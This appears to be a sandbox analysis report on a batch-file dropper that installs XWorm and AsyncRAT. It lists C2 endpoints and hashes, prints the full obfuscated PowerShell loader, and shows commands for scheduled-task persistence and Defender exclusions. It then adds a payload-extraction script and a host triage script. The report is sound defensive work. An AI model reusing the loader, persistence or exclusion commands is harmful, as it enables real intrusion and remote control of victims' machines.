Analysis

  • max time kernel
    146s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    04-07-2024 13:22

General

  • Target

    Playit Free.bat

  • Size

    292KB

  • MD5

    2bac01a226b5c7b08de93311ab9905d5

  • SHA1

    48144153d2ca3d9cc7e27506b3d1923c9d80cc7a

  • SHA256

    bf73489935f2d196e04d1eb012f3c8ab16263fb3d005aac58d63322313db1186

  • SHA512

    96f50b01f8c69befabbb307c5e4b58e304ec5d8339c9cca4bf927add6ec9f912ca4c87f5e13ec3c34737e47a7ab35d15de32c4b8b84c11e05dccfc9b5ce3f7f6

  • SSDEEP

    6144:JLbgUUyQ6VV3W7bmjOk8Cl/iZYwD6rjwY+H+4hjhphHCxsu:JLbgPyQ6z3DOERkDUIHLlJu

Malware Config

Extracted

Family

xworm

C2

super-nearest.gl.at.ply.gg:17835

best-bird.gl.at.ply.gg:27196

wiz.bounceme.net:6000

Attributes
  • install_file

    USB.exe

aes.plain

Extracted

Family

asyncrat

Botnet

Default

C2

finally-grande.gl.at.ply.gg:25844

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is a remote access trojan written in C#, designed to remotely monitor and control other computers.

  • Detect Xworm Payload 5 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Runs PowerShell with its display window hidden (-w hidden).

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, most likely for geofencing.

  • Executes dropped EXE 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Playit Free.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4056
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nkzg1mkfrHDUSX6khNCFu2GC0GRW40N8z0jb2WU/2wk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+SIhEEEdUoAvS3C0hLoK1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Eejjc=New-Object System.IO.MemoryStream(,$param_var); $rNGlN=New-Object System.IO.MemoryStream; $fjHYd=New-Object System.IO.Compression.GZipStream($Eejjc, [IO.Compression.CompressionMode]::Decompress); $fjHYd.CopyTo($rNGlN); $fjHYd.Dispose(); $Eejjc.Dispose(); $rNGlN.Dispose(); $rNGlN.ToArray();}function execute_function($param_var,$param2_var){ $BawPg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DvyFJ=$BawPg.EntryPoint; $DvyFJ.Invoke($null, $param2_var);}$FmsBL = 'C:\Users\Admin\AppData\Local\Temp\Playit Free.bat';$host.UI.RawUI.WindowTitle = $FmsBL;$LeiwM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FmsBL).Split([Environment]::NewLine);foreach ($OYikl in $LeiwM) { if ($OYikl.StartsWith('riSZShbqVrDJFHBMOGEs')) { $adCgQ=$OYikl.Substring(20); break; }}$payloads_var=[string[]]$adCgQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      2⤵
        PID:1404
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2124
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_82_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_82.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4060
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_82.vbs"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4748
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_82.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3712
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nkzg1mkfrHDUSX6khNCFu2GC0GRW40N8z0jb2WU/2wk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+SIhEEEdUoAvS3C0hLoK1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Eejjc=New-Object System.IO.MemoryStream(,$param_var); $rNGlN=New-Object System.IO.MemoryStream; $fjHYd=New-Object System.IO.Compression.GZipStream($Eejjc, [IO.Compression.CompressionMode]::Decompress); $fjHYd.CopyTo($rNGlN); $fjHYd.Dispose(); $Eejjc.Dispose(); $rNGlN.Dispose(); $rNGlN.ToArray();}function execute_function($param_var,$param2_var){ $BawPg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DvyFJ=$BawPg.EntryPoint; $DvyFJ.Invoke($null, $param2_var);}$FmsBL = 'C:\Users\Admin\AppData\Roaming\Windows_Log_82.bat';$host.UI.RawUI.WindowTitle = $FmsBL;$LeiwM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FmsBL).Split([Environment]::NewLine);foreach ($OYikl in $LeiwM) { if ($OYikl.StartsWith('riSZShbqVrDJFHBMOGEs')) { $adCgQ=$OYikl.Substring(20); break; }}$payloads_var=[string[]]$adCgQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
              5⤵
                PID:1044
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                5⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:4324
                • C:\Users\Admin\AppData\Local\Temp\scvhost.exe
                  "C:\Users\Admin\AppData\Local\Temp\scvhost.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:3404
                • C:\Users\Admin\AppData\Local\Temp\mshta.exe
                  "C:\Users\Admin\AppData\Local\Temp\mshta.exe"
                  6⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:4068
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\mshta.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4536
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mshta.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4112
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4352
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3496
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=2860,i,2607710392823067546,4648797561512801463,262144 --variations-seed-version --mojo-platform-channel-handle=4012 /prefetch:8
        1⤵
          PID:1060
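
The two long cmd.exe command lines above (PIDs 1404 and 1044) are the whole loader: cmd.exe echoes a PowerShell script and a hidden powershell.exe consumes it. The script hides its .NET calls behind reversed string literals ('gnirtS46esaBmorF'[-1..-16] -join '' is FromBase64String, 'daoL' reversed is Load, 'txeTllAdaeR' reversed is ReadAllText), reads its own .bat file back from disk, takes the first line that starts with the 20-character marker riSZShbqVrDJFHBMOGEs, splits the remainder on '\' into two chunks, maps the custom alphabet back to base64 ('#' to '/', '@' to 'A'), AES-CBC-decrypts each chunk with a key and IV that are hard-coded in the command line, gunzips the result and reflectively loads it with Assembly.Load before invoking its EntryPoint. Because key, IV and ciphertext all sit in the same file, the embedded assemblies can be recovered statically. The script below is an added example, not the sample's own code; it re-implements the decode chain but writes the assemblies to disk instead of loading them. The marker, key and IV are copied from the captured command line and are specific to this sample; the script name, the $OutDir parameter and the payloadN.bin file names are my own choices.

```powershell
# Extract-PlayitPayloads.ps1 (added example; not the sample's code)
# Offline re-implementation of the loader's decode chain: carrier line -> custom
# base64 -> AES-256-CBC -> gzip -> .NET assembly, written to disk rather than loaded.
param(
    [Parameter(Mandatory)] [string] $BatPath,
    [string] $OutDir = '.\extracted'          # assumption: output directory of my choosing
)

$Marker = 'riSZShbqVrDJFHBMOGEs'   # 20-char prefix of the carrier line inside the .bat
$Key    = [Convert]::FromBase64String('nkzg1mkfrHDUSX6khNCFu2GC0GRW40N8z0jb2WU/2wk=')  # 32 bytes, from the command line
$IV     = [Convert]::FromBase64String('+SIhEEEdUoAvS3C0hLoK1A==')                      # 16 bytes, from the command line

# Mirrors decrypt_function: AES-CBC, PKCS7 padding, one-shot TransformFinalBlock.
function Unprotect-Blob([byte[]] $Data) {
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key = $Key
        $aes.IV  = $IV
        $dec = $aes.CreateDecryptor()
        try {
            $plain = $dec.TransformFinalBlock($Data, 0, $Data.Length)
            return ,$plain      # leading comma keeps the byte[] intact through the pipeline
        } finally { $dec.Dispose() }
    } finally { $aes.Dispose() }
}

# Mirrors decompress_function: the decrypted blob is a gzip stream.
function Expand-Gzip([byte[]] $Data) {
    $in  = New-Object System.IO.MemoryStream(,$Data)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
    try {
        $gz.CopyTo($out)
        $bytes = $out.ToArray()
        return ,$bytes
    } finally { $gz.Dispose(); $in.Dispose(); $out.Dispose() }
}

# The loader does ReadAllText($FmsBL).Split(NewLine) and keeps the first line that starts with the marker.
$line = Get-Content -LiteralPath $BatPath | Where-Object { $_.StartsWith($Marker) } | Select-Object -First 1
if (-not $line) { throw "No line starting with '$Marker' found in $BatPath" }

New-Item -ItemType Directory -Force -Path $OutDir | Out-Null
$n = 0
foreach ($chunk in $line.Substring($Marker.Length).Split('\')) {
    if ([string]::IsNullOrWhiteSpace($chunk)) { continue }
    $n++
    # Custom alphabet used by the loader: '#' stands for '/', '@' stands for 'A'.
    $b64 = $chunk.Replace('#', '/').Replace('@', 'A')
    [byte[]] $raw = Expand-Gzip (Unprotect-Blob ([Convert]::FromBase64String($b64)))
    $isPE = ($raw.Length -gt 2) -and ($raw[0] -eq 0x4D) -and ($raw[1] -eq 0x5A)   # 'MZ' header
    $path = Join-Path $OutDir ("payload{0}.bin" -f $n)    # .bin extension so nothing executes it by accident
    [IO.File]::WriteAllBytes($path, $raw)
    $sha = (Get-FileHash -Algorithm SHA256 -LiteralPath $path).Hash.ToLower()
    [pscustomobject]@{ Payload = $n; Bytes = $raw.Length; IsPE = $isPE; SHA256 = $sha; Path = $path }
}
```

Run it on an isolated analysis host as `.\Extract-PlayitPayloads.ps1 -BatPath '.\Playit Free.bat'`; it never calls Assembly.Load, so nothing in the sample executes. The loader passes payload1 an empty argument list and payload2 a single empty string, which is the pattern to expect when feeding the two dumped assemblies to a .NET decompiler. Other builds of this loader change the marker, the key and the IV (and sometimes the substitution characters), so treat those three constants as per-sample inputs rather than a fixed signature.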

        Network

        MITRE ATT&CK Matrix (ATT&CK v13)

        Execution
          • T1059 Command and Scripting Interpreter (1 signature)
              • T1059.001 PowerShell (1 signature)

        Discovery
          • T1012 Query Registry (1 signature)
          • T1082 System Information Discovery (2 signatures)

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          3KB

          MD5

          661739d384d9dfd807a089721202900b

          SHA1

          5b2c5d6a7122b4ce849dc98e79a7713038feac55

          SHA256

          70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

          SHA512

          81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
          Filesize

          2KB

          MD5

          005bc2ef5a9d890fb2297be6a36f01c2

          SHA1

          0c52adee1316c54b0bfdc510c0963196e7ebb430

          SHA256

          342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

          SHA512

          f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          77d622bb1a5b250869a3238b9bc1402b

          SHA1

          d47f4003c2554b9dfc4c16f22460b331886b191b

          SHA256

          f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

          SHA512

          d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          d65ebc84c6b0b52901fb46f5e2b83ab5

          SHA1

          d036a0c3eb9e1616d0f7f5ca41171060c13a3095

          SHA256

          d45581b0807a0d04a70ec75e3e4575e73f148e5b4e0d3d325dfbd6400a4bfbd1

          SHA512

          88ac232e7702ebd53788cf8429d266ae367111bfccf4bc9d40ead25b552347521458ca60d320e2775b5d2edcaf8501251cb2db68b38dc000ac50463fb80865be

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          12c844ed8342738dacc6eb0072c43257

          SHA1

          b7f2f9e3ec4aaf5e2996720f129cd64887ac91d7

          SHA256

          2afeb7db4e46d3c1524512a73448e9cd0121deec761d8aa54fa9fe8b56df7519

          SHA512

          e3de9103533a69cccc36cd377297ba3ec9bd7a1159e1349d2cc01ab66a88a5a82b4ee3af61fab586a0cdfab915c7408735439fd0462c5c2cc2c787cb0765766a

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_orr2a3kg.dmp.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\mshta.exe
          Filesize

          70KB

          MD5

          c5431c4b11742bc4ab73e896dd47153b

          SHA1

          16e6869c71d4ee978dfcc29b48f277f55828a331

          SHA256

          bc404ae20b7085100cd7a7efddb28ce54014309bdbd60a5d57c135d44b950c4a

          SHA512

          888a843e81400b900fb5a36ff171b03149d2719406e778614809cfaaa7e81e2e9deb6807d01ff1cec7ed1db30b585121fc8606d2bc52ffc5fc4d86e9d2b12f37

        • C:\Users\Admin\AppData\Local\Temp\scvhost.exe
          Filesize

          63KB

          MD5

          1ca366d46cb1726508257459a9cbbf3f

          SHA1

          183e7cd4165bd195cb05c7e474037f2a22707c67

          SHA256

          76bb01ad0452e2f834661d54744645a14d057be883ad51d2b447f8d6c48d5129

          SHA512

          aec28910c3f2015ea252d9e2c1a497eec8fd3ef0bc4ff0bf42a593f159a3539df8ec7b01487def04099ca68040ec3d484492319b7bfbafedcbd7bcc2627e67be

        • C:\Users\Admin\AppData\Roaming\Windows_Log_82.bat
          Filesize

          292KB

          MD5

          2bac01a226b5c7b08de93311ab9905d5

          SHA1

          48144153d2ca3d9cc7e27506b3d1923c9d80cc7a

          SHA256

          bf73489935f2d196e04d1eb012f3c8ab16263fb3d005aac58d63322313db1186

          SHA512

          96f50b01f8c69befabbb307c5e4b58e304ec5d8339c9cca4bf927add6ec9f912ca4c87f5e13ec3c34737e47a7ab35d15de32c4b8b84c11e05dccfc9b5ce3f7f6

        • C:\Users\Admin\AppData\Roaming\Windows_Log_82.vbs
          Filesize

          114B

          MD5

          e39c831199e0dff67c3230b04f978409

          SHA1

          865806658353cb771d47bbf60c6942f57104c631

          SHA256

          9f35c6f9f6446ee00eb1bb7f9031f113f6c35c0322e0d2ef4ec7f82af7cf6398

          SHA512

          ee355d5bbe6fdffc1f0fd705cb101cc01a41577da058ed3668fb6f0a44063b5f16df3718f4bee5ffcb4c66bec6869101061b87f74618872fd6e2609ee7f85dfd

        • memory/2124-55-0x00007FFF009A0000-0x00007FFF01461000-memory.dmp
          Filesize

          10.8MB

        • memory/2124-14-0x00000164FEE90000-0x00000164FEF06000-memory.dmp
          Filesize

          472KB

        • memory/2124-1-0x00000164E4810000-0x00000164E4832000-memory.dmp
          Filesize

          136KB

        • memory/2124-11-0x00007FFF009A0000-0x00007FFF01461000-memory.dmp
          Filesize

          10.8MB

        • memory/2124-12-0x00007FFF009A0000-0x00007FFF01461000-memory.dmp
          Filesize

          10.8MB

        • memory/2124-16-0x00000164E4870000-0x00000164E48B8000-memory.dmp
          Filesize

          288KB

        • memory/2124-15-0x00000164E4860000-0x00000164E4868000-memory.dmp
          Filesize

          32KB

        • memory/2124-13-0x00000164FEA40000-0x00000164FEA84000-memory.dmp
          Filesize

          272KB

        • memory/2124-0-0x00007FFF009A3000-0x00007FFF009A5000-memory.dmp
          Filesize

          8KB

        • memory/3404-76-0x00000000006D0000-0x00000000006E6000-memory.dmp
          Filesize

          88KB

        • memory/4060-29-0x00007FFF009A0000-0x00007FFF01461000-memory.dmp
          Filesize

          10.8MB

        • memory/4060-27-0x00007FFF009A0000-0x00007FFF01461000-memory.dmp
          Filesize

          10.8MB

        • memory/4060-28-0x00007FFF009A0000-0x00007FFF01461000-memory.dmp
          Filesize

          10.8MB

        • memory/4060-32-0x00007FFF009A0000-0x00007FFF01461000-memory.dmp
          Filesize

          10.8MB

        • memory/4068-77-0x0000000000290000-0x00000000002A8000-memory.dmp
          Filesize

          96KB

        • memory/4068-124-0x000000001C060000-0x000000001C06E000-memory.dmp
          Filesize

          56KB

        • memory/4324-54-0x000001F1FC570000-0x000001F1FC58A000-memory.dmp
          Filesize

          104KB
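
The process tree and the Downloads section together give a compact set of host indicators: the loader copies itself unchanged to %AppData%\Roaming\Windows_Log_82.bat (same SHA256 as Playit Free.bat) and registers a logon scheduled task named Windows_Log_82_str that runs Windows_Log_82.vbs at the highest run level; the second-stage PowerShell drops mshta.exe and scvhost.exe into %LocalAppData%\Temp (the former is not the system binary, note the path) and adds Defender exclusions for both the dropped mshta.exe and powershell.exe by path and by process name. The following added triage script, which is not part of the report, checks a host for exactly those artifacts plus the configured C2 endpoints, using only local data sources. The task name, file paths, hashes, exclusion entries and C2 host:port pairs are copied from this report; the script name, the $Report keys and the labels in $Known are my own.

```powershell
# Find-PlayitFreeArtifacts.ps1 (added triage example; not part of the report)
# Run elevated. Every check reads local state only; nothing here touches the network.
$ErrorActionPreference = 'SilentlyContinue'
$Report = [ordered]@{}

# 1. Persistence: the logon task registered by powershell.exe (PID 4060 in the process tree)
$Report.ScheduledTask = Get-ScheduledTask -TaskName 'Windows_Log_82_str' |
    Select-Object TaskName, State,
        @{ n = 'RunLevel'; e = { $_.Principal.RunLevel } },
        @{ n = 'Execute';  e = { ($_.Actions | ForEach-Object Execute) -join ';' } }

# 2. Dropped files in every user profile, matched against the SHA256 values from the Downloads section
$Known = @{   # labels are mine; hashes are the report's
    'bf73489935f2d196e04d1eb012f3c8ab16263fb3d005aac58d63322313db1186' = 'Windows_Log_82.bat (identical to Playit Free.bat)'
    '9f35c6f9f6446ee00eb1bb7f9031f113f6c35c0322e0d2ef4ec7f82af7cf6398' = 'Windows_Log_82.vbs'
    'bc404ae20b7085100cd7a7efddb28ce54014309bdbd60a5d57c135d44b950c4a' = 'mshta.exe (dropped copy in Temp)'
    '76bb01ad0452e2f834661d54744645a14d057be883ad51d2b447f8d6c48d5129' = 'scvhost.exe (dropped)'
}
$RelPaths = 'AppData\Roaming\Windows_Log_82.bat', 'AppData\Roaming\Windows_Log_82.vbs',
            'AppData\Local\Temp\mshta.exe',       'AppData\Local\Temp\scvhost.exe'
$Report.Files = @(foreach ($profile in Get-ChildItem -Path "$env:SystemDrive\Users" -Directory) {
    foreach ($rel in $RelPaths) {
        $path = Join-Path $profile.FullName $rel
        if (Test-Path -LiteralPath $path -PathType Leaf) {
            $sha = (Get-FileHash -Algorithm SHA256 -LiteralPath $path).Hash.ToLower()
            [pscustomobject]@{ Path = $path; SHA256 = $sha; Matches = $Known[$sha] }
        }
    }
})

# 3. Defender exclusions added with Add-MpPreference (PIDs 4536, 4112, 4352, 3496)
$mp = Get-MpPreference
$Report.DefenderExclusions = [pscustomobject]@{
    Paths     = @($mp.ExclusionPath | Where-Object {
                    $_ -like '*\AppData\Local\Temp\mshta.exe' -or $_ -like '*\WindowsPowerShell\v1.0\powershell.exe' })
    Processes = @($mp.ExclusionProcess | Where-Object { $_ -in 'mshta.exe', 'powershell.exe' })
}

# 4. C2 contact: DNS client cache entries and established TCP sessions to the configured ports
$C2 = 'super-nearest.gl.at.ply.gg:17835', 'best-bird.gl.at.ply.gg:27196',
      'wiz.bounceme.net:6000',            'finally-grande.gl.at.ply.gg:25844'
$C2Hosts = $C2 | ForEach-Object { $_.Split(':')[0] }
$C2Ports = $C2 | ForEach-Object { [int] $_.Split(':')[1] }
$Report.DnsCache    = @(Get-DnsClientCache | Where-Object { $_.Entry -in $C2Hosts } | Select-Object Entry, Data)
$Report.Connections = @(Get-NetTCPConnection -State Established |
    Where-Object { $_.RemotePort -in $C2Ports } |
    Select-Object RemoteAddress, RemotePort, OwningProcess,
        @{ n = 'Process'; e = { (Get-Process -Id $_.OwningProcess).ProcessName } })

# 5. Running instances of the dropped executables (path-based: a real mshta.exe lives in System32)
$Report.Processes = @(Get-CimInstance Win32_Process |
    Where-Object { $_.ExecutablePath -like '*\AppData\Local\Temp\mshta.exe' -or
                   $_.ExecutablePath -like '*\AppData\Local\Temp\scvhost.exe' } |
    Select-Object ProcessId, ExecutablePath, CommandLine)

$Report
```

The scheduled task, the Defender exclusions and a file hash match are the high-confidence signals; the port check is the weakest, because the *.gl.at.ply.gg names are relay endpoints on shared addresses whose ports are assigned per tunnel, so match on hostname where you can and do not block the relay IP alone. When cleaning up, stop the processes from step 5 first, then Unregister-ScheduledTask the task, then remove the exclusions with Remove-MpPreference -ExclusionPath / -ExclusionProcess (leaving them in place means the next copy runs unscanned), and only then delete the files.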